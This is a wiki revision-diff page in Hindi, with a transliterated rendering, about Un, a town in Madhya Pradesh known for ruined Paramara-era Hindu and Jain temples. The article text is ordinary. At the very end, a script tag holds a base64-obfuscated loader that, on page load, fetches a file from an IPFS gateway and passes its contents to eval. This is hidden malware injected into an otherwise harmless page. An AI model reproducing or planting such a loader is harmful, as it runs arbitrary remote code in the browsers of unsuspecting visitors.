Difference between revisions of "उन मध्य प्रदेश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
[[चित्र:Shantinath-Temple-Pavagiri-Oon.jpg|thumb|शांतिनाथ मंदिर, पवागिरी, उन]]
 
[[चित्र:Shantinath-Temple-Pavagiri-Oon.jpg|thumb|शांतिनाथ मंदिर, पवागिरी, उन]]
 
'''उन''' [[मध्य प्रदेश]] राज्य के [[इंदौर ज़िला|इंदौर ज़िले]] में नीमाड़ के मैदान में [[सतपुड़ा पर्वतश्रेणी|सतपुड़ा की पहाड़ियों]] के उत्तरी छोर पर बसा हुआ [[कस्बा]] है।  
 
'''उन''' [[मध्य प्रदेश]] राज्य के [[इंदौर ज़िला|इंदौर ज़िले]] में नीमाड़ के मैदान में [[सतपुड़ा पर्वतश्रेणी|सतपुड़ा की पहाड़ियों]] के उत्तरी छोर पर बसा हुआ [[कस्बा]] है।  
*[[मालवा]] के परमार नरेशों के समय के लगभग बारह मंदिरों के खण्डहर यहाँ स्थित हैं।  
+
*[[मालवा]] के [[परमार वंश|परमार नरेशों]] के समय के लगभग बारह मंदिरों के खण्डहर यहाँ स्थित हैं।  
 
*ये मंदिर मध्ययुगीन [[हिंदू]] तथा [[जैन]] [[वास्तुकला]] के अच्छे उदाहरण हैं।  
 
*ये मंदिर मध्ययुगीन [[हिंदू]] तथा [[जैन]] [[वास्तुकला]] के अच्छे उदाहरण हैं।  
*इनमें चौबारा डेरा नाम का मंदिर प्रमुख है।  
+
*इनमें '''चौबारा डेरा''' नाम का मंदिर प्रमुख है।  
*ग्राम के उत्तर की ओर कालेश्वर का मंदिर है और ग्राम के भीतर नीलकंठेश्वर [[शिव]] का।
+
*ग्राम के [[उत्तर (दिशा)|उत्तर]] की ओर '''कालेश्वर का मंदिर''' है और ग्राम के भीतर नीलकंठेश्वर [[शिव]] का मंदिर है।
 +
 
 +
 
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 97| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
 
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
 
[[Category:मध्य प्रदेश]]
 
[[Category:मध्य प्रदेश]]
 
[[Category:मध्य प्रदेश के ऐतिहासिक स्थान]]
 
[[Category:मध्य प्रदेश के ऐतिहासिक स्थान]]
[[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:ऐतिहासिक स्थान कोश]] [[Category:ऐतिहासिक स्थानावली]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:12, 16 May 2018

thumb|shaantinath mandir, pavagiri, un un madhy pradesh rajy ke iandaur zile mean nima d ke maidan mean satapu da ki paha diyoan ke uttari chhor par basa hua kasba hai.

  • malava ke paramar nareshoan ke samay ke lagabhag barah mandiroan ke khandahar yahaan sthit haian.
  • ye mandir madhyayugin hiandoo tatha jain vastukala ke achchhe udaharan haian.
  • inamean chaubara dera nam ka mandir pramukh hai.
  • gram ke uttar ki or kaleshvar ka mandir hai aur gram ke bhitar nilakantheshvar shiv ka mandir hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 97| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>